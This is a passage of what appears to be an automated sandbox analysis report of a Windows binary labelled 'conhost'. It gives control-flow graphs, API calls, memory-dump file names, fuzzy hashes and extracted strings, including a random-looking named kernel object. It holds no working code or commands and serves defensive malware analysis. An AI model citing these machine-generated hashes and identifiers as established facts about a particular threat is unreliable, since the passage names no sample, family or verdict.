40->87 97 Function_00000001400014D6 40->97 99 Function_00000001400026E0 40->99 41 Function_0000000140001650 42 Function_0000000140002050 43 Function_0000000140005850 44 Function_0000000140003051 45 Function_0000000140005751 46 Function_0000000140005951 47 Function_000000014000155D 47->72 48->72 49 Function_0000000140002460 51->40 51->51 51->57 65 Function_0000000140001880 51->65 66 Function_0000000140001F90 51->66 51->87 52 Function_0000000140001760 100 Function_00000001400020E0 52->100 53 Function_0000000140001E65 53->57 54->72 55->72 56 Function_000000014000216F 59 Function_0000000140001A70 59->35 59->76 60 Function_0000000140003070 61 Function_0000000140005771 62 Function_0000000140005871 63 Function_0000000140005971 64->72 65->23 65->35 65->50 65->76 68 Function_0000000140002590 69 Function_0000000140003090 70 Function_0000000140002691 71 Function_0000000140005791 72->4 72->34 73 Function_0000000140002194 73->57 74 Function_000000014000219E 75 Function_0000000140001FA0 76->35 80 Function_00000001400023B0 76->80 92 Function_00000001400024D0 76->92 77 Function_00000001400058A1 78->72 79->72 82 Function_00000001400022B0 83 Function_00000001400026B0 84 Function_00000001400030B1 85 Function_00000001400059B1 86 Function_0000000140001AB3 86->35 86->76 89 Function_00000001400057C1 90 Function_0000000140001AC3 90->35 90->76 91 Function_00000001400014C7 91->72 93 Function_00000001400017D0 94 Function_0000000140001FD0 95 Function_00000001400026D0 96 Function_0000000140001AD4 96->35 96->76 97->72 98 Function_00000001400022E0 99->3 99->7 99->15 99->21 99->29 99->47 99->48 99->50 99->58 99->79 99->91 101 Function_00000001400017E0 101->100

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtDelayExecution.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001156), ref: 00000001400013F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: DelayExecution
                                                                  • String ID:
                                                                  • API String ID: 1249177460-0
                                                                  • Opcode ID: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
                                                                  • Instruction ID: ea77cefef780fe59d28cb35e84be700af1ff747ec22ba00de631e0254e728e30
                                                                  • Opcode Fuzzy Hash: 3210746a9923182c7327b5e3e833e7d58ed368a322bb56d3eeddf1d7b1502087
                                                                  • Instruction Fuzzy Hash: C7F0A4B2608B408AEA11DB52F85179A77A1F38D7C0F005919BBC947735DB3CC150CB40

                                                                  Control-flow Graph

                                                                  control_flow_graph 308 1400026e0-14000273b call 140002660 312 140002741-14000274b 308->312 313 14000280e-14000285e call 14000155d 308->313 315 140002774-14000277a 312->315 318 140002953-14000297b call 1400014c7 313->318 319 140002864-140002873 313->319 315->313 317 140002780-140002787 315->317 320 140002789-140002792 317->320 321 140002750-140002752 317->321 335 140002986-1400029c8 call 140001503 call 140005a30 318->335 336 14000297d 318->336 322 140002eb7-140002ef4 call 140001370 319->322 323 140002879-140002888 319->323 326 140002794-1400027ab 320->326 327 1400027f8-1400027fb 320->327 324 14000275a-14000276e 321->324 332 1400028e4-14000294e wcsncmp call 1400014e5 323->332 333 14000288a-1400028dd 323->333 324->313 324->315 330 1400027f5 326->330 331 1400027ad-1400027c2 326->331 327->324 330->327 337 1400027d0-1400027d7 331->337 332->318 333->332 346 140002e49-140002e84 call 140001370 335->346 347 1400029ce-1400029d5 335->347 336->335 339 1400027d9-1400027f3 337->339 340 140002800-140002809 337->340 339->330 339->337 340->324 350 1400029d7-140002a0c 346->350 354 140002e8a 346->354 349 140002a13-140002a43 wcscpy wcscat wcslen 347->349 347->350 352 140002a45-140002a76 wcslen 349->352 353 140002a78-140002aa5 349->353 350->349 355 140002aa8-140002abf wcslen 352->355 353->355 354->349 356 140002ac5-140002ad8 355->356 357 140002e8f-140002eab call 140001370 355->357 358 140002af5-140002dfb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 356->358 359 140002ada-140002aee 356->359 357->322 378 140002dfd-140002e1b call 140001512 358->378 379 140002e20-140002e48 call 14000145e 358->379 359->358 378->379
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$wcscatwcscpywcsncmp
                                                                  • String ID: 0$X$\BaseNamedObjects\apjuapcjhayoqqdtaiqiwnuw$`
                                                                  • API String ID: 597572034-2729595976
                                                                  • Opcode ID: 6d3c64ac2ea357c0a5b61e3601eb7ad5b86c86965fd9e469a58225b2c0d7551c
                                                                  • Instruction ID: f25b8d236e5ed2f4933913023d454351ab484624ba5bcdbbd352bca3d169ea7b
                                                                  • Opcode Fuzzy Hash: 6d3c64ac2ea357c0a5b61e3601eb7ad5b86c86965fd9e469a58225b2c0d7551c
                                                                  • Instruction Fuzzy Hash: DA1247B2608BC481E762CB16F8443EAB7A4F789794F414215EBA857BF5EF78C189C700

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 14c80104db45f04c9cd9d24016d4d4c5cd86efcd8b03c73a3ef0435ab2a7c743
                                                                  • Instruction ID: d3d635c034e2ace449ccca4873d2abfe7504a33e0aec3559774c9c19de847b60
                                                                  • Opcode Fuzzy Hash: 14c80104db45f04c9cd9d24016d4d4c5cd86efcd8b03c73a3ef0435ab2a7c743
                                                                  • Instruction Fuzzy Hash: DE5113B1A11A4085FB16EF27F9947EA27A5BB8D7D0F449121FB4E873B6DE38C4958300

                                                                  Control-flow Graph

                                                                  control_flow_graph 424 140001ba0-140001bc0 425 140001bc2-140001bd7 424->425 426 140001c09 424->426 427 140001be9-140001bf1 425->427 428 140001c0c-140001c17 call 1400023b0 426->428 429 140001bf3-140001c02 427->429 430 140001be0-140001be7 427->430 435 140001cf4-140001cfe call 140001d40 428->435 436 140001c1d-140001c6c call 1400024d0 VirtualQuery 428->436 429->430 432 140001c04 429->432 430->427 430->428 434 140001cd7-140001cf3 memcpy 432->434 440 140001d03-140001d1e call 140001d40 435->440 436->440 441 140001c72-140001c79 436->441 443 140001d23-140001d38 GetLastError call 140001d40 440->443 444 140001c7b-140001c7e 441->444 445 140001c8e-140001c97 441->445 447 140001cd1 444->447 448 140001c80-140001c83 444->448 449 140001ca4-140001ccf VirtualProtect 445->449 450 140001c99-140001c9c 445->450 447->434 448->447 452 140001c85-140001c8a 448->452 449->443 449->447 450->447 453 140001c9e 450->453 452->447 454 140001c8c 452->454 453->449 454->453
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                  • memcpy.MSVCRT ref: 0000000140001CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,0000000140007C14,0000000140007C14,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 93ac8dcbe28fb5ed14e4fc1c9fcb0d521b65e865588380c125eceea53853d859
                                                                  • Instruction ID: b11b68c805dc1d775e406fc4762d143c9136bcd1c990b12f6602ac898b7d07a9
                                                                  • Opcode Fuzzy Hash: 93ac8dcbe28fb5ed14e4fc1c9fcb0d521b65e865588380c125eceea53853d859
                                                                  • Instruction Fuzzy Hash: 4F4143F1601A4586FA26DF47F884BE927A0E78DBC4F554126EF0E877B1DA38C586C700

                                                                  Control-flow Graph

                                                                  control_flow_graph 455 140002104-14000210b 456 140002111-140002128 EnterCriticalSection 455->456 457 140002218-140002221 455->457 458 14000220b-140002212 LeaveCriticalSection 456->458 459 14000212e-14000213c 456->459 460 140002272-140002280 457->460 461 140002223-14000222d 457->461 458->457 462 14000214d-140002159 TlsGetValue GetLastError 459->462 463 140002241-140002263 DeleteCriticalSection 461->463 464 14000222f 461->464 466 14000215b-14000215e 462->466 467 140002140-140002147 462->467 463->460 465 140002230-14000223f 464->465 465->463 466->467 468 140002160-14000216d 466->468 467->458 467->462 468->467
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 926137887-0
                                                                  • Opcode ID: 02dbac1ae92357609f4b8c89d713a412b6c8c97b3527304cd21e8be1c69a91a2
                                                                  • Instruction ID: c0e6f3c9640eef52c2cf5e528612c39f7eff26e03b764db1fbee3e18b15c28ca
                                                                  • Opcode Fuzzy Hash: 02dbac1ae92357609f4b8c89d713a412b6c8c97b3527304cd21e8be1c69a91a2
                                                                  • Instruction Fuzzy Hash: 1D21E3B1715A0292FA5BDB53F9483E923A0B76CBD0F444021FB1E576B4DF7A8986C300

                                                                  Control-flow Graph

                                                                  control_flow_graph 471 140001e10-140001e2d 472 140001e3e-140001e48 471->472 473 140001e2f-140001e38 471->473 475 140001ea3-140001ea8 472->475 476 140001e4a-140001e53 472->476 473->472 474 140001f60-140001f69 473->474 475->474 479 140001eae-140001eb3 475->479 477 140001e55-140001e60 476->477 478 140001ecc-140001ed1 476->478 477->475 480 140001f23-140001f2d 478->480 481 140001ed3-140001ee2 signal 478->481 482 140001eb5-140001eba 479->482 483 140001efb-140001f0a call 140005fe0 479->483 486 140001f43-140001f45 480->486 487 140001f2f-140001f3f 480->487 481->480 484 140001ee4-140001ee8 481->484 482->474 488 140001ec0 482->488 483->480 492 140001f0c-140001f10 483->492 489 140001eea-140001ef9 signal 484->489 490 140001f4e-140001f53 484->490 486->474 487->486 488->480 489->474 493 140001f5a 490->493 494 140001f12-140001f21 signal 492->494 495 140001f55 492->495 493->474 494->474 495->493
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.4209503987.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000023.00000002.4209468886.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209527282.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209559604.0000000140009000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000023.00000002.4209578757.000000014000A000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_140000000_conhost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748

                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641

                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141

                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0